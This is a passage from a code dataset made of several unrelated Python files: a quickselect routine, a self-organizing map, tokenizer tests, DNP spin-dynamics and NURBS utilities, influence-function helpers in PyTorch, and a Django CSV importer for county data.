find_kth(self, A, i, j, k):\n p = self.pivot(A, i, j)\n if k == p:\n return A[p]\n elif k < p:\n return self.find_kth(A, i, p, k)\n else:\n return self.find_kth(A, p+1, j, k)\n\n def pivot(self, A, i, j):\n p = i\n closed = p\n for ptr in xrange(i, j):\n if A[ptr] < A[p]:\n closed += 1\n A[closed], A[ptr] = A[ptr], A[closed]\n\n A[closed], A[p] = A[p], A[closed]\n return closed\n\nif __name__ == \"__main__\":\n assert Solution().kthLargestElement(10, range(1, 11)) == 1\n\n","sub_path":"Kth Largest Element.py","file_name":"Kth Largest Element.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"456833182","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg as la\n\nfrom util import find\n\ndef som(X, eta, stddev, mapsize, tmax):\n \"\"\"\n\tsom, a visualization method\n \"\"\"\n #--- prepare W ---#\n # W holds 1xd vectors\n # W is a mapsize x mapsize array\n W = np.empty((mapsize, mapsize), np.matrix)\n dim = len(X[0, :])# dimension\n for (idx, w) in enumerate(W):\n tmp = np.empty((mapsize), np.matrix)\n for i in range(0, len(tmp.T)):\n arr = np.random.random_sample(dim)\n tmp[i] = np.matrix(arr)# cast into matrix\n W[idx, :] = tmp\n #--- define gamma function ---#\n def gamma(r_win, r):\n tmp_vec = r_win - r\n return np.exp(- tmp_vec.dot(tmp_vec.T) / (2*stddev))\n #--- update weights ---#\n for x in X:\n # prepare result variable\n scores = np.zeros((9,9))\n for idx, w in enumerate(W):\n for 
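A quick property check for the quickselect in the 'Kth Largest Element' record above (note the module targets Python 2, given the xrange in pivot): the k-th largest element must agree with a full sort. The list is copied because find_kth partitions in place:

import random

A = random.sample(range(100), 20)
assert Solution().kthLargestElement(5, list(A)) == sorted(A)[-5]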
i, u in enumerate(w):\n vec = x - u\n scores[idx, i] = vec * vec.T\n # iswinner => returns coordinates of the winner neuron\n iswinner = scores==np.max(scores)# => returns coordinates\n # update the weight vectors\n for idx, w in enumerate(W):\n for i, u in enumerate(w):\n W[idx, i] += eta * \\\n gamma(np.asarray([idx,i]), \\\n np.asarray(find( iswinner.tolist()))) \\\n * x\n return W\n\ndef computeUmatrix(W):\n umatrix = np.asarray(np.zeros([2*len(W),2*len(W.T)]).tolist())\n for idx, w in enumerate(W):\n for i, u in enumerate(w):\n umatrix[2*idx, 2*i] = la.norm(W[idx, i])\n if idx == len(W)-1:\n idx_n = 0\n else:\n idx_n = idx+1\n if i == len(W.T)-1:\n i_n = 0\n else:\n i_n = i+1\n umatrix[2*idx+1, 2*i] = W[idx, i].dot(W[idx_n, i].T)\n umatrix[2*idx, 2*i+1] = W[idx, i].dot(W[idx, i_n].T)\n for idx, w in enumerate(W):\n for i, u in enumerate(w):\n idx_row = 2*idx+1\n idx_col = 2*i+1\n if idx_row == 2*len(W)-1:\n idx_n = 0\n else:\n idx_n = idx_row+1\n if idx_col == 2*len(W.T)-1:\n i_n = 0\n else:\n i_n = idx_col+1\n umatrix[idx_row, idx_col] = np.average(\\\n [umatrix[idx_row-1, idx_col-1],\\\n umatrix[idx_row-1, i_n],\\\n umatrix[idx_n, idx_col-1],\\\n umatrix[idx_n, i_n]])\n return umatrix\n\nif __name__ == \"__main__\":\n \"\"\"\n test flight of the som implementation\n \"\"\"\n X = np.random.random_sample(size=(2, 4))\n eta = 0.7# rate of study\n stddev = 0.01# gaussian range, standard deviation\n mapsize = 9# the length of one axis\n tmax = 50# study iteration times\n\n W = som(X, eta, stddev, mapsize, tmax)\n plt.imshow(computeUmatrix(W))\n plt.title('weight vectors')\n plt.show()\n","sub_path":"som.py","file_name":"som.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"287443535","text":"from unittest import TestCase\n\nfrom JackTokenizer import JackTokenizer, TokenType, KeywordType\nfrom io import StringIO\n\n\nclass TestJackTokenizer(TestCase):\n\n def test_has_more_tokens(self):\n buf = StringIO(\"\"\"\n /*空文件,没有内容\n */\n /*空文件,当行注释移除*/\n \"\"\")\n tokenizer = JackTokenizer(buf)\n self.assertFalse(tokenizer.has_more_tokens())\n buf = StringIO(\"\"\"\n class Main{ /*空文件,没有内容\n */ }\n \"\"\")\n tokenizer = JackTokenizer(buf)\n self.assertTrue(tokenizer.has_more_tokens())\n\n def test_advance(self):\n buf = StringIO(\"\"\"\n /*空文件,没有内容\n */\n \"\"\")\n tokenizer = JackTokenizer(buf)\n with self.assertRaisesRegex(ValueError, \"has no more tokens.*\"):\n tokenizer.advance()\n buf = StringIO(\"\"\"\n class Main{\n }\n \"\"\")\n tokenizer = JackTokenizer(buf)\n tokenizer.advance()\n\n def test_token_type(self):\n tokenizer = JackTokenizer(\"ArrayTest/Main.jack\")\n tokenizer.advance()\n self.assertEqual(TokenType.keyword, tokenizer.token_type())\n self.assertEqual(tokenizer.keyword(), KeywordType.CLASS)\n tokenizer.advance()\n self.assertEqual(TokenType.identifier, tokenizer.token_type())\n self.assertEqual(tokenizer.identifier(), \"Main\")\n\n tokenizer.advance()\n self.assertEqual(TokenType.symbol, tokenizer.token_type())\n self.assertEqual(tokenizer.symbol(), \"{\")\n\n i = 0\n while tokenizer.has_more_tokens():\n i += 1\n tokenizer.advance()\n if i == 43:\n self.assertEqual(TokenType.integerConstant, tokenizer.token_type())\n self.assertEqual(tokenizer.intVal(), '0')\n if i == 28:\n self.assertEqual(TokenType.stringConstant, tokenizer.token_type())\n self.assertEqual(tokenizer.stringVal(), \"HOW MANY NUMBERS? 
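Two spots in the som() loop above diverge from the conventional Kohonen rule: the winner is taken as the unit with the largest squared distance (scores == np.max(scores)), and the update adds eta * gamma * x rather than moving the weight toward the sample. A corrected inner step under the standard rule could read as follows (a sketch; variable names follow the original):

iswinner = scores == np.min(scores)        # nearest unit wins, not farthest
win = np.asarray(find(iswinner.tolist()))
for idx, w in enumerate(W):
    for i, u in enumerate(w):
        # Move each weight toward the sample, scaled by the neighborhood.
        W[idx, i] += eta * gamma(np.asarray([idx, i]), win) * (x - W[idx, i])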
\")\n","sub_path":"11/test_JackTokenizer.py","file_name":"test_JackTokenizer.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"402627846","text":"import numpy as np\nimport parameters as param\nimport spin_matrices as sp\nfrom scipy import constants as sc\nfrom scipy import linalg as la\nimport f2py_dynamics as fortran_se\nimport matplotlib.pyplot as plt\nimport f2py_cross_effect as fortran_ce\nimport time\n\n\ndef liouville_propagator(num_spins, energies, eigvectors, eigvectors_inv,\n microwave_hamiltonian_init, calculate_relaxation_mat, spin_all):\n \"\"\" Calculate Liouville space propagator.\n \"\"\"\n\n # Pre-allocate propagator\n propagator = np.zeros((int(param.time_step_num), 4 ** num_spins, 4 ** num_spins), dtype=np.complex)\n\n # Calculate variables for original Liouville space relaxation\n p_e = np.tanh(0.5 * param.electron_frequency * (sc.Planck / (sc.Boltzmann * param.temperature)))\n p_n = np.tanh(0.5 * param.freq_nuclear_1 * (sc.Planck / (sc.Boltzmann * param.temperature)))\n gnp = 0.5 * (1 - p_n) * (1 / (1 * param.t1_nuc))\n gnm = 0.5 * (1 + p_n) * (1 / (1 * param.t1_nuc))\n gep = 0.5 * (1 - p_e) * (1 / (1 * param.t1_elec))\n gem = 0.5 * (1 + p_e) * (1 / (1 * param.t1_elec))\n\n # Calculate variables for Mance Liouville space relaxation\n boltzmann_elec = param.electron_frequency * (sc.Planck / (sc.Boltzmann * param.temperature))\n boltzmann_nuc = param.freq_nuclear_1 * (sc.Planck / (sc.Boltzmann * param.temperature))\n\n # spin3_s1_z = spin_all[1]\n\n for count in range(0, int(param.time_step_num)):\n\n # Transform microwave Hamiltonian into time dependent basis\n microwave_hamiltonian = np.matmul(eigvectors_inv[count], np.matmul(microwave_hamiltonian_init,\n eigvectors[count]))\n\n # Calculate total Hamiltonian\n total_hamiltonian = np.diag(energies[count]) + microwave_hamiltonian\n\n # start = time.time()\n # for bench in range(0, int(1E6)):\n # #test = np.matmul(eigvectors_inv[count], np.matmul(spin3_s1_z, eigvectors[count]))\n # # eigvectors_liouville = np.kron(eigvectors[count], eigvectors[count])\n # hamiltonian_liouville = kron_rmat_eye(total_hamiltonian, 2 ** num_spins)\n # print('kron_rmat_eye', (time.time() - start))\n #\n # start = time.time()\n # for bench in range(0, int(1E6)):\n # # test = np.matmul(eigvectors_inv[count], np.matmul(spin3_s1_z, eigvectors[count]))\n # # eigvectors_liouville = np.kron(eigvectors[count], eigvectors[count])\n # hamiltonian_liouville = np.kron(total_hamiltonian, np.eye(4))\n # print('np.kron', (time.time() - start))\n\n # Transform Hilbert space Hamiltonian into Liouville space\n hamiltonian_liouville = kron_rmat_eye(total_hamiltonian, 2 ** num_spins) - \\\n kron_eye_rmat(2 ** num_spins, np.transpose(total_hamiltonian))\n\n # Calculate time dependent Liouville space relaxation matrix\n relax_mat = calculate_relaxation_mat(eigvectors[count], eigvectors_inv[count], gnp, gnm, gep, gem, spin_all)\n\n # Calculate time dependent solid effect origonal Liouville space relaxation matrix using F2PY\n # relax_mat = fortran.solid_effect_dynamics.calculate_relaxation_mat(\n # eigvectors[count], eigvectors_inv[count], np.eye(4), np.eye(16), 16, 4, sp.spin2_s_z, sp.spin2_s_p,\n # sp.spin2_s_m, sp.spin2_i_z, sp.spin2_i_p, sp.spin2_i_m, param.t2_elec, param.t2_nuc, gnp, gnm, gep, gem)\n\n # Calculate time dependent cross effect origonal Liouville space relaxation matrix using F2PY\n # relax_mat = 
fortran_ce.cross_effect_dynamics.calculate_relaxation_mat(\n # eigvectors[count], eigvectors_inv[count], np.eye(8), np.eye(64), 64, 8, sp.spin3_s1_z, sp.spin3_s1_p,\n # sp.spin3_s1_m, sp.spin3_s2_z, sp.spin3_s2_p, sp.spin3_s2_m, sp.spin3_i_z, sp.spin3_i_p, sp.spin3_i_m,\n # param.t2_elec, param.t2_nuc, gnp, gnm, gep, gem)\n\n # Calculate time dependent cross effect Mance Liouville space relaxation matrix using F2PY\n # relax_mat = fortran_ce.cross_effect_dynamics.calculate_relaxation_mat_mance(\n # eigvectors[count], eigvectors_inv[count], 64, 8, sp.spin3_s1_x, sp.spin3_s1_z,\n # sp.spin3_s2_x, sp.spin3_s2_z, sp.spin3_i_x, sp.spin3_i_z, param.t1_elec, param.t1_nuc, param.t2_elec,\n # param.t2_nuc, boltzmann_elec, boltzmann_nuc)\n\n # Calculate Liouville space eigenvectors\n eigvectors_liouville = np.kron(eigvectors[count], eigvectors[count])\n eigvectors_inv_liouville = np.kron(eigvectors_inv[count], eigvectors_inv[count])\n\n # Calculate Liouville space propagator\n liouvillian = hamiltonian_liouville + 1j * relax_mat\n propagator[count, :] = np.matmul(eigvectors_inv_liouville,\n np.matmul(la.expm(-1j * liouvillian * param.time_step),\n eigvectors_liouville))\n\n # exp_mat = la.expm(-1j * liouvillian * param.time_step)\n # spin1_x = sp.spin1_x\n # spin1_z = sp.spin1_z\n # temp1 = np.real(eigvectors_inv_liouville)\n # temp2 = np.real(exp_mat)\n # temp3 = np.real(eigvectors_liouville)\n start = time.time()\n for bench in range(0, int(1E4)):\n exp_test = la.expm(-1j * liouvillian * param.time_step)\n #test = np.matmul(spin1_x, spin1_z)\n #test = np.matmul(eigvectors_inv[count], np.matmul(spin3_s1_z, eigvectors[count]))\n #propagator[count, :] = np.matmul(eigvectors_inv_liouville, np.matmul(test, eigvectors_liouville))\n #test = np.matmul(temp1, np.matmul(temp2, temp3))\n # eigvectors_liouville = np.kron(eigvectors[count], eigvectors[count])\n #hamiltonian_liouville = kron_rmat_eye(total_hamiltonian, 2 ** num_spins)\n print('la.expm', (time.time() - start))\n\n return propagator\n\n\ndef basis_transform(eigvectors, eigvectors_inv, matrices):\n \"\"\" Transforms basis of inputted list of numpy arrays.\n \"\"\"\n\n matrices_out = np.copy(matrices)\n for count in range(0, len(matrices)):\n matrices_out[count] = np.matmul(eigvectors_inv, np.matmul(matrices[count], eigvectors))\n\n return matrices_out\n\n\ndef density_mat_thermal(hamiltonian_ideal):\n \"\"\" Calculate initial thermal density matrix from Boltzmann factors.\n \"\"\"\n\n # Calculate energies of idealised Hamiltonian\n energies_ideal = np.diag(hamiltonian_ideal)\n\n # Calculate initial Zeeman basis density matrix from Boltzmann factors\n boltzmann_factors = np.zeros(len(hamiltonian_ideal))\n for count in range(0, hamiltonian_ideal.shape[0]):\n boltzmann_factors[count] = np.exp(-(sc.Planck * energies_ideal[count]) / (sc.Boltzmann * param.temperature))\n density_mat = (1/np.sum(boltzmann_factors)) * np.diagflat(boltzmann_factors)\n\n return density_mat\n\n\ndef anisotropy_coefficients(angles):\n \"\"\" Calculate time independent coefficients for electron g-anisotropy.\n \"\"\"\n\n gx = param.electron_frequency * param.gtensor[0]\n gy = param.electron_frequency * param.gtensor[1]\n gz = param.electron_frequency * param.gtensor[2]\n\n ca = np.cos(angles[0])\n cb = np.cos(angles[1])\n cg = np.cos(angles[2])\n sa = np.sin(angles[0])\n sb = np.sin(angles[1])\n sg = np.sin(angles[2])\n\n r11 = ca * cb * cg - sa * sg\n r12 = sa * cb * cg + ca * sg\n r13 = -sb * cg\n r21 = -ca * cb * sg - sa * cg\n r22 = -sa * cb * sg + ca * cg\n r23 = sb * 
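density_mat_thermal above builds level populations from Boltzmann factors; the same computation inlined for a hypothetical two-level system (the frequency and temperature are made-up illustration values, not the module's param settings):

import numpy as np
from scipy import constants as sc

freq = 400e6         # assumed transition frequency in Hz
temperature = 100.0  # assumed temperature in K
energies = np.array([-0.5 * freq, 0.5 * freq])
factors = np.exp(-(sc.Planck * energies) / (sc.Boltzmann * temperature))
rho = np.diagflat(factors / factors.sum())
print(np.diag(rho))  # lower level slightly over-populated; trace is 1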
sg\n r31 = ca * sb\n r32 = sa * sb\n r33 = cb\n\n c0 = 1 / 3 * (gx + gy + gz)\n c1 = 2 * np.sqrt(2) / 3 * (gx * r11 * r31 + gy * r12 * r32 + gz * r13 * r33)\n c2 = 2 * np.sqrt(2) / 3 * (gx * r21 * r31 + gy * r22 * r32 + gz * r23 * r33)\n c3 = 1 / 3 * (gx * (r11 ** 2 - r21 ** 2) + gy * (r12 ** 2 - r22 ** 2) + gz * (r13 ** 2 - r23 ** 2))\n c4 = 2 / 3 * (gx * r11 * r21 + gy * r22 * r12 + gz * r13 * r23)\n\n return c0, c1, c2, c3, c4\n\n\ndef anisotropy(c0, c1, c2, c3, c4, time):\n \"\"\" Calculate time dependent electron g-anisotropy.\n \"\"\"\n\n g_anisotropy = c0 + c1 * np.cos(2 * np.pi * param.freq_rotor * time) + \\\n c2 * np.sin(2 * np.pi * param.freq_rotor * time) + \\\n c3 * np.cos(2 * np.pi * param.freq_rotor * time * 2) + \\\n c4 * np.sin(2 * np.pi * param.freq_rotor * time * 2)\n\n return g_anisotropy\n\n\ndef hyperfine(hyperfine_angles, time):\n \"\"\" Calculate time dependent hyperfine, neglecting zy coupling.\n \"\"\"\n\n hyperfine_zz = param.hyperfine_coupling * (-0.5 * (np.sin(hyperfine_angles[1]) ** 2) *\n np.cos(2 * (2 * np.pi * param.freq_rotor * time + hyperfine_angles[2])) +\n np.sqrt(2) * np.sin(hyperfine_angles[1]) *\n np.cos(hyperfine_angles[1]) *\n np.cos(2 * np.pi * param.freq_rotor * time + hyperfine_angles[2]))\n\n hyperfine_zx = param.hyperfine_coupling * (-0.5 * np.sin(hyperfine_angles[1]) * np.cos(hyperfine_angles[1]) *\n np.cos(2 * np.pi * param.freq_rotor * time + hyperfine_angles[2]) -\n (np.sqrt(2) / 4) * (np.sin(hyperfine_angles[1]) ** 2) *\n np.cos(2 * (2 * np.pi * param.freq_rotor * time + hyperfine_angles[2])) +\n (np.sqrt(2) / 4) * (3 * (np.cos(hyperfine_angles[1]) ** 2) - 1))\n\n return hyperfine_zz, hyperfine_zx\n\n\ndef kron_rmat_eye(mat, val):\n \"\"\" Calculates np.kron(mat, np.eye(val)) of square matrix mat\n \"\"\"\n\n n = mat.shape[0]\n out = np.zeros((n, val, n, val), dtype=mat.dtype)\n for i in range(0, val):\n out[:, i, :, i] = mat\n out.shape = (n * val, n * val)\n\n return out\n\n\ndef kron_eye_rmat(val, mat):\n \"\"\" Calculates np.kron(np.eye(val), mat) of square matrix mat\n \"\"\"\n\n n = mat.shape[0]\n out = np.zeros((val, n, val, n), dtype=mat.dtype)\n for i in range(0, val):\n out[i, :, i, :] = mat\n out.shape = (n * val, n * val)\n\n return out\n","sub_path":"Python/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"226116990","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndegree = 3\nknots = (0.0, 0.0, 0.0, 0.0, 0.16666666666666666, 0.333, 0.5, 0.667, 0.833, 1.0, 1.0, 1.0, 1.0)\n\nmDegree = 3\n\nctrlpts = [[5.0, 10.0], [15.0, 25.0], [30.0, 30.0], [45.0, 5.0], [55.0, 5.0], [70.0, 40.0], [60.0, 60.0], [35.0, 60.0], [20.0, 40.0]]\nmWeights = [1.0] * len(ctrlpts)\n\n\n\ndef basis_functions(degree=0, knotvector=(), span=0, knot=0):\n \"\"\" Algorithm A2.2 of The NURBS Book by Piegl & Tiller.\"\"\"\n left = [None for x in range(degree+1)]\n right = [None for x in range(degree+1)]\n N = [None for x in range(degree + 1)]\n\n # N[0] = 1.0 by definition\n N[0] = 1.0\n\n for j in range(1, degree+1):\n left[j] = knot - knotvector[span+1-j]\n right[j] = knotvector[span+j] - knot\n saved = 0.0\n for r in range(0, j):\n temp = N[r] / (right[r+1] + left[j-r])\n N[r] = saved + right[r+1] * temp\n saved = left[j-r] * temp\n N[j] = saved\n\n return N\n\ndef find_span(degree=0, knotvector=(), num_ctrlpts=0, knot=0, tol=0.001):\n \"\"\" Algorithm A2.1 of The NURBS Book by Piegl & Tiller.\"\"\"\n # 
Number of knots; m + 1\n # Number of control points; n + 1\n # n = m - p - 1; where p = degree\n #m = len(knotvector) - 1\n #n = m - degree - 1\n n = num_ctrlpts - 1\n if abs(knotvector[n + 1] - knot) <= tol:\n return n\n\n low = degree\n high = n + 1\n mid = int((low + high) / 2)\n\n while (knot < knotvector[mid]) or (knot >= knotvector[mid + 1]):\n if knot < knotvector[mid]:\n high = mid\n else:\n low = mid\n mid = int((low + high) / 2)\n\n return mid\n\ndef evaluate_rational():\n \"\"\" Evaluates the NURBS curve.\n\n .. note:: The evaluated surface points are stored in :py:attr:`~curvepts`.\n\n :return: None\n \"\"\"\n mCurvePts = []\n # Algorithm A4.1\n for u in np.arange(0, 1, mDelta):\n span = find_span(mDegree, tuple(knots), len(ctrlpts), u)\n basis = basis_functions(mDegree, tuple(knots), span, u)\n\n curveptw = [0.0, 0.0, 0.0]\n for i in range(0, mDegree + 1):\n curveptw[0] += (basis[i] * mWeights[span - mDegree + i]) * (ctrlpts[span - mDegree + i][0])\n # sum(basis_i_k*weights_i_k*ctrlpts_i)\n curveptw[1] += (basis[i] * mWeights[span - mDegree + i]) * (ctrlpts[span - mDegree + i][1])\n curveptw[2] += (basis[i] * mWeights[span - mDegree + i])\n\n\n # Divide by weight\n curvept = [float(curveptw[0] / curveptw[2]), float(curveptw[1] / curveptw[2])]\n mCurvePts.append(curvept)\n return mCurvePts\n\ndef evaluate_rational_numpy():\n \"\"\" Evaluates the NURBS curve.\n\n .. note:: The evaluated surface points are stored in :py:attr:`~curvepts`.\n\n :return: None\n \"\"\"\n mCurvePts = []\n\n n_pixels = 100\n dPixel = 1./n_pixels\n pixels = np.arange(0., 1., dPixel)\n\n n_ctrlpts = len(ctrlpts)\n\n spans = ([find_span(mDegree, tuple(knots), n_ctrlpts, pixel) for pixel in pixels])\n bases = ([basis_functions(mDegree, tuple(knots), spans[span], pixel) for span, pixel in enumerate(pixels)])\n\n\n pts = np.zeros((n_ctrlpts, n_pixels))\n\n for c, u in enumerate(np.arange(0., 1., dPixel)):\n basis = bases[c]\n pts_c = np.sum([(basis[i] * mWeights[spans[c] - mDegree + i]) for i in range(0,mDegree+1)])\n for i in range(0,mDegree+1):\n pts[spans[c] - mDegree + i,c] = (basis[i] * mWeights[spans[c] - mDegree + i])/pts_c\n\n\n\n\n return pts\n\n#pts = evaluate_rational_numpy()\n\ndef evaluate_rational_sliceable(xs):\n \"\"\" Evaluates the NURBS curve.\n\n .. 
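A property check for the find_span/basis_functions pair above: at any parameter value, the degree+1 nonzero B-spline basis functions returned by Algorithm A2.2 sum to one (partition of unity):

import numpy as np

for u in np.linspace(0.0, 0.99, 7):
    span = find_span(mDegree, knots, len(ctrlpts), u)
    assert abs(sum(basis_functions(mDegree, knots, span, u)) - 1.0) < 1e-9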
note:: The evaluated surface points are stored in :py:attr:`~curvepts`.\n\n :return: None\n \"\"\"\n mCurvePts = []\n\n n_xs = np.size(xs)\n\n n_ctrlpts = len(ctrlpts)\n\n spans = ([find_span(mDegree, tuple(knots), n_ctrlpts, x) for x in xs])\n bases = ([basis_functions(mDegree, tuple(knots), spans[i], x) for i, x in enumerate(xs)])\n\n\n pts = np.zeros((n_ctrlpts, n_xs))\n\n for c, u in enumerate(xs):\n basis = bases[c]\n pts_c = np.sum([(basis[i] * mWeights[spans[c] - mDegree + i]) for i in range(0,mDegree+1)])\n for i in range(0,mDegree+1):\n pts[spans[c] - mDegree + i,c] = (basis[i] * mWeights[spans[c] - mDegree + i])/pts_c\n\n\n\n\n return pts\n\npts = evaluate_rational_sliceable(np.arange(0,1,0.01))\n\nxs = np.array(ctrlpts)\nx = np.dot(pts.transpose(),xs[:,0])\ny = np.dot(pts.transpose(),xs[:,1])\n\nplt.plot(x,y)\nplt.show()\n","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"570104801","text":"import utility\nimport torch\nfrom torch.autograd import grad\n\n\ndef s_test(z_test, t_test, model, z_loader, gpu=-1, damp=0.01, scale=25.0, repeat=5000):\n \"\"\"s_test can be precomputed for each test point of interest, and then\n multiplied with grad_z to get the desired value for each training point.\n Here, strochastic estimation is used to calculate s_test.\n\n Arguments:\n z_test: torch tensor, test data points, such as test images\n t_test: torch tensor, test data labels\n model: torch NN, model used to evaluate the dataset\n z_loader: torch Dataloader, can load the training dataset\n gpu: int, GPU id to use if >=0 and -1 means use CPU\n damp: float, dampening factor\n scale: float, scaling factor\n repeat: int, number of iterations aka recursion depth\n\n Returns:\n h_estimate: list of torch tensors, s_test\"\"\"\n v = grad_z(z_test, t_test, model, gpu)\n h_init_estimates = v.copy()\n\n for _ in utility.create_progressbar(repeat, desc='s_test'):\n # take just one random sample from training dataset\n # easiest way to just use the DataLoader once\n for x, t in z_loader:\n if gpu >= 0:\n x, t = x.cuda(gpu), t.cuda(gpu)\n y = model(x)\n loss = model.calc_loss(y, t)\n hv = hvp(loss, list(model.parameters()), h_init_estimates)\n # Recursively caclulate h_estimate\n h_estimate = [\n _v + (1 - damp) * h_estimate - _hv / scale\n for _v, h_estimate, _hv in zip(v, h_init_estimates, hv)]\n # h_estimate = []\n # for _v, h_estimate, _hv in zip(v, h_init_estimates, hv):\n # h_estimate = (_v + (1 - damp) * h_estimate - _hv / scale)\n break\n return h_estimate\n\n\ndef grad_z(z, t, model, gpu=-1):\n \"\"\"Calculates the gradient\n\n Arguments:\n z: torch tensor, training data points\n e.g. 
an image sample (batch_size, 3, 256, 256)\n        t: torch tensor, training data labels\n        model: torch NN, model used to evaluate the dataset\n        gpu: int, device id to use for GPU, -1 for CPU\n\n    Returns:\n        grad_z: list of torch tensors, containing the gradients\n        from model parameters to loss\"\"\"\n    model.eval()\n    # initialize\n    if gpu >= 0:\n        z, t = z.cuda(gpu), t.cuda(gpu)\n        model.cuda(gpu)\n    y = model(z)\n    loss = model.calc_loss(y, t)\n    # Compute sum of gradients from model parameters to loss\n    return list(grad(loss, list(model.parameters()), create_graph=True))\n\n\ndef hvp(y, w, v):\n    \"\"\"Multiply the Hessian of y (taken with respect to w) by v.\n    Uses a backprop-like approach to compute the product between the Hessian\n    and another vector efficiently, which even works for large Hessians.\n    Example: if y = w^T A w then hvp(y, w, v) returns an expression\n    which evaluates to the same values as (A + A.T) v.\n\n    Arguments:\n        y: scalar, for example the output of the loss function\n        w: list of torch tensors, tensors over which the Hessian\n            should be constructed\n        v: list of torch tensors, same shape as w,\n            will be multiplied with the Hessian\n\n    Returns:\n        return_grads: list of torch tensors, contains product of Hessian and v.\n\n    Raises:\n        ValueError: `w` and `v` have a different length.\"\"\"\n    if len(w) != len(v):\n        raise ValueError(\"w and v must have the same length.\")\n\n    # First backprop\n    first_grads = grad(y, w, retain_graph=True, create_graph=True)\n\n    # Elementwise products\n    elemwise_products = 0\n    for grad_elem, v_elem in zip(first_grads, v):\n        elemwise_products += torch.sum(grad_elem * v_elem)\n\n    # Second backprop\n    return_grads = grad(elemwise_products, w, create_graph=True)\n\n    return return_grads\n\n\nif __name__ == '__main__':\n    from trainer_mnist import MnistTrainer\n    from net import Net\n    from optimizers import MomentumSGD\n    model = Net()\n    optimizer = MomentumSGD(model, 0, 0)\n    main = MnistTrainer(model, optimizer, train_batch_size=1)\n    z_test, t_test = main.test_loader.dataset[0]\n    z_test = main.test_loader.collate_fn([z_test])\n    t_test = main.test_loader.collate_fn([t_test])\n    test = s_test(z_test, t_test, model, main.train_loader, gpu=-1)\n","sub_path":"influence_function.py","file_name":"influence_function.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"35423449","text":"# Logic for reading data points out of a CSV file.\n# We have three possible column formats; this uses a different function\n# to retrieve counties from the database depending on the format\n# choice that is passed in at runtime\n\nimport csv\n\nfrom hda_privileged.models import US_State, US_County, Data_Point\n\n# constants\n\nCHOICE_NAME = \"NAME\"\nCHOICE_1FIPS = \"1FIPS\"\nCHOICE_2FIPS = \"2FIPS\"\n\nUPLOAD_FORMAT_CHOICES = [\n    (CHOICE_NAME, \"Use state name ('State') and county name ('County')\"),\n    (CHOICE_1FIPS, \"Use single 5-digit FIPS code ('FIPS')\"),\n    (CHOICE_2FIPS, \"Use 2-digit state ('State') and 3-digit county ('County') FIPS codes\"),\n]\n\n\n# Regardless of whether the file was using 5-digit FIPS codes or split ones,\n# the heavy lifting of FIPS code matching is done here: both get_county_with_2fips\n# and get_county_with_1fips call this method after extracting the appropriate codes\n# from the CSV rows.\ndef get_county_with_fips(state_fips, county_fips):\n    \"\"\"\n\n    :param state_fips: 2-digit state FIPS code, e.g. '01'\n    :param county_fips: 3-digit county FIPS code, e.g. '001'\n\n    \"\"\"\n    try:\n        state = US_State.objects.get(fips=state_fips)\n        
county = state.counties.get(fips=county_fips)\n return (county, None)\n except US_State.DoesNotExist:\n msg = {county_fips:state_fips}\n return (None, msg)\n except US_County.DoesNotExist:\n msg = {county_fips: state_fips}\n return (None, msg)\n\n# Defines functions that can translate a DictReader row into a county model object\n# based on the selected column format. e.g. if 'choice' is 'NAME', we want a\n# function that takes in a DictReader row and uses the state name and county name\n# to query and return a unique US_County instance.\n# These functions have the signature:\n# func(row: dict): (US_County, None) | (None, String)\n# i.e. they return a tuple where either the first member is a county instance,\n# OR the second member is an error message.\n\n\ndef get_county_with_2fips(row):\n \"\"\"\n\n :param row: breaks the combination of state_fips and county_fips into state_fips and county_fips respectively\n\n \"\"\"\n state_fips = row['State']\n county_fips = row['County']\n return get_county_with_fips(state_fips, county_fips)\n\n\ndef get_county_with_1fips(row):\n \"\"\"\n\n :param row: combination of state_fips and county_fips\n\n \"\"\"\n fips = row['FIPS']\n state_fips = fips[0:2]\n county_fips = fips[2:5]\n return get_county_with_fips(state_fips, county_fips)\n\n\ndef get_county_with_name(row):\n \"\"\"\n\n :param row: reads the state and county name\n\n \"\"\"\n state_name = row['State']\n county_name = row['County']\n try:\n state = US_State.objects.get(full=state_name)\n except US_State.DoesNotExist:\n msg = {county_name: state_name}\n return (None, msg)\n # can't use get with startswith for counties, because of situations like:\n # Clay County, GA and Clayton County, GA\n # trying to use startswith=Clay will match both of these\n # county = state.counties.get(name__startswith=county_name)\n possible_counties = state.counties.filter(name__startswith=county_name)\n # how do we narrow this down?\n if possible_counties.count() == 1:\n return (possible_counties.first(), None)\n elif possible_counties.count() > 1:\n # if we matched a substring of multiple county names, prefer the shortest as being\n # the most exact; first evaluate the query\n county_iter = possible_counties.iterator()\n # sort in ascending order of name length, returning a list\n shortest_first = sorted(county_iter, key=lambda c: len(c.name))\n # return the first county (shortest name)\n return (shortest_first[0], None)\n else:\n msg = {county_name: state_name}\n return (None, msg)\n\n# map choice options to the appropriate function for parsing counties\nUPLOAD_FORMAT_FUNCTIONS = {\n CHOICE_1FIPS: get_county_with_1fips,\n CHOICE_2FIPS: get_county_with_2fips,\n CHOICE_NAME: get_county_with_name,\n}\n\n\ndef read_data_points_from_file(file, choice, data_set):\n \"\"\"Reads all the data points from a CSV file, adding them to the given data set.\n\n :param file: user's selected csv file\n :param choice: one of the choice codes from UPLOAD_FORMAT_CHOICES\n :param CHOICE_NAME: assume the State and County columns contain full names in each row\n :param CHOICE_1FIPS: assume there is one column to uniquely identify the county\n :param CHOICE_2FIPS: assume the State and County columns contain 2 FIPS: codes\n :param data_set: a Data_Set model instance\n :returns: A list of Data_Point model objects, one per row in the CSV file, all pointing to\n the indicated Data_Set instance.\n\n \"\"\"\n county_getter = UPLOAD_FORMAT_FUNCTIONS.get(choice, None)\n 